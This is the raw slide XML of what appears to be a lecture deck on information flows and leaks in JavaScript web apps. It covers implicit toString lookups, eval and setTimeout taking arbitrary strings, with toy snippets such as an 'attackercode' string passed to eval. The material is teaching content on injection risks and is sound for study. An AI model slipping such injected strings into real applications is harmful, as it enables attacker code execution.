          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Troisième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Quatrième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="x-none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B55D4F-3243-4014-A6A5-2F354E9ED1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469834" y="4477564"/>
            <a:ext cx="5211689" cy="88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Cliquez et modifiez le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B55D4F-3243-4014-A6A5-2F354E9ED1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B55D4F-3243-4014-A6A5-2F354E9ED1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24" y="876605"/>
            <a:ext cx="2375211" cy="1396530"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2700" b="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="x-none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8904" y="876605"/>
            <a:ext cx="6344047" cy="6173068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x-none" smtClean="0"/>
              <a:t>Cliquez pour modifier les styles du texte du masque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Deuxième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Troisième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Quatrième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="x-none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525" y="2357910"/>
            <a:ext cx="2375211" cy="4696464"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="506852" indent="0">
              <a:buNone/>
              <a:defRPr sz="1300"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1013704" indent="0">
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1520556" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2027408" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2534260" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3041112" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3547963" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4054815" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="x-none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B55D4F-3243-4014-A6A5-2F354E9ED1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5199" y="3962258"/>
            <a:ext cx="6173068" cy="176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24" y="877048"/>
            <a:ext cx="2378524" cy="1399903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x-none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73256" y="927648"/>
            <a:ext cx="6554283" cy="608742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500"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="506852" indent="0">
              <a:buNone/>
              <a:defRPr sz="3100"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1013704" indent="0">
              <a:buNone/>
              <a:defRPr sz="2700"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1520556" indent="0">
              <a:buNone/>
              <a:defRPr sz="2200"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2027408" indent="0">
              <a:buNone/>
              <a:defRPr sz="2200"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2534260" indent="0">
              <a:buNone/>
              <a:defRPr sz="2200"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3041112" indent="0">
              <a:buNone/>
              <a:defRPr sz="2200"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3547963" indent="0">
              <a:buNone/>
              <a:defRPr sz="2200"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4054815" indent="0">
              <a:buNone/>
              <a:defRPr sz="2200"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="x-none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524" y="2361283"/>
            <a:ext cx="2375211" cy="4695580"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="506852" indent="0">
              <a:buNone/>
              <a:defRPr sz="1300"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1013704" indent="0">
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1520556" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2027408" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2534260" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3041112" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3547963" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4054815" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="x-none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B55D4F-3243-4014-A6A5-2F354E9ED1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44347"/>
            <a:ext cx="10150475" cy="2529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70" tIns="50685" rIns="101370" bIns="50685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7524" y="590321"/>
            <a:ext cx="9135428" cy="1096310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="101370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="x-none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524" y="1770962"/>
            <a:ext cx="9135428" cy="5397218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="101370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Cliquez pour modifier les styles du texte du masque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Deuxième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Troisième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Quatrième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="x-none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0150475" cy="404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70" tIns="50685" rIns="101370" bIns="50685"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7524" y="20240"/>
            <a:ext cx="3214317" cy="364312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="101370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="13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06428" y="20240"/>
            <a:ext cx="4567714" cy="364312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="101370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0"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729" y="20240"/>
            <a:ext cx="1184222" cy="364312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="101370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="16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7B55D4F-3243-4014-A6A5-2F354E9ED1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</p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="1013704" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="4400" kern="1200" spc="-111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02741" indent="-202741" algn="l" defTabSz="1013704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06852" indent="-202741" algn="l" defTabSz="1013704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10963" indent="-202741" algn="l" defTabSz="1013704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15074" indent="-202741" algn="l" defTabSz="101370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17815" indent="-152056" algn="l" defTabSz="1013704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520556" indent="-202741" algn="l" defTabSz="101370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723297" indent="-202741" algn="l" defTabSz="101370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6037" indent="-202741" algn="l" defTabSz="101370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28778" indent="-202741" algn="l" defTabSz="101370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6852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3704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556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27408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4260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1112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47963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54815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diagramData" Target="../diagrams/data2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors2.xml"/><Relationship Id="rId8" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing2.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId10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eg"/><Relationship Id="rId3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10.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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1074898" y="2927773"/>
            <a:ext cx="8511557" cy="549376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>Information Flows in Web Apps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4571181" y="4154959"/>
            <a:ext cx="1518990" cy="9144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dirty="0" smtClean="0"/>
              <a:t>Lecture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1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Web Evolution</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Diagram 5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1691746" y="1539259"/>
          <a:ext cx="6766983" cy="4511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011341" y="6387207"/>
            <a:ext cx="4139134" cy="369324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/>
              <a:t>see evolutionoftheweb.com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014413" y="1223967"/>
            <a:ext cx="8741344" cy="5347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1354" tIns="50676" rIns="101354" bIns="50676">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="31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badObj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="31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{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="31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	function () {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="31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		return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty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31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secretproperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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1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}}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="31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569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="31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569816" indent="-569816" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="31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lookup(window, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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badObj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="31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window[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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badObj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="31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window[{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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: …}]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="31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w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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indow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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[{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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toS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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…: …}.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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toS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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… ()]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="31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window[(function () …) ()]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569816" indent="-569816" eaLnBrk="0" hangingPunct="0">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="31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window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty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31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secretproperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="31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27925" y="758826"/>
            <a:ext cx="2368550" cy="1764335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="101354" tIns="50676" rIns="101354" bIns="50676">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>…in fact,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>unsafe!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1165817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allAtOnce"/>
      <p:bldP spid="15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Important detail: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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3100" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>In JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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o.f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>    is treated as    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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o[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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1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f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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1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]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3500" dirty="0"/>
          </a:p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Security problem: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	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Via the implicit invocation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, a   property could evaluate to  an undesirable choice of the attacker</a:t>
            </a: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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 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85378" y="49386"/>
            <a:ext cx="9134475" cy="1265238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>Leaks via implicit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t> invocation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259495130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Leaks via EVAL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28165843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eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> that men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31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31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31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1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3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en-US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“function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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attackercode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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(){…};</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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attackercode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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();}”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3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4675568" y="2679228"/>
            <a:ext cx="159868" cy="9563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5155171" y="2121385"/>
            <a:ext cx="2637818" cy="379351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="101362" tIns="50681" rIns="101362" bIns="50681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This is a string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75855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3044825" y="4468813"/>
            <a:ext cx="1100138" cy="844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62" tIns="50681" rIns="101362" bIns="50681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1412875" y="506413"/>
            <a:ext cx="9134475" cy="9271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cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr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dirty="0" err="1" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: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setTimeout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38140" y="1939927"/>
            <a:ext cx="9220200" cy="1564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362" tIns="50681" rIns="101362" bIns="50681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function f() { alert('hello'); }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="35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setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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(f, 1000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/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38140" y="3879851"/>
            <a:ext cx="9220200" cy="1607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362" tIns="50681" rIns="101362" bIns="50681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5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3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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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alert('hello')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty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3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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="35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setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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(s, 1000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/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429375" y="5481640"/>
            <a:ext cx="2706688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362" tIns="50681" rIns="101362" bIns="50681">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Any JavaScript string!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3912803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  <p:bldP spid="6" grpId="0"/>
      <p:bldP spid="7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Important detail: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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3100" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  interprets any string as code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3500" dirty="0"/>
          </a:p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Security problem:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>If a string of the attacker gets to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>	  attacker       	executes his code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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85378" y="49386"/>
            <a:ext cx="9134475" cy="1265238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>Leaks via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>eval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204162646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Leaks via NATIVE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96630547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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2338933" y="1346647"/>
            <a:ext cx="5073650" cy="601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r>
              <a:rPr lang="en-US" sz="3200" dirty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r>
              <a:rPr lang="en-US" sz="32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(x) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if (x &lt;= 1) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        return 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="32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3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    return x*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(x-1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3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3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r =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(3);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s = "alert("+r+")"</a:t>
            </a:r>
          </a:p>
          <a:p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setTimeout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(s, 100)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;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85378" y="49386"/>
            <a:ext cx="9134475" cy="1265238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
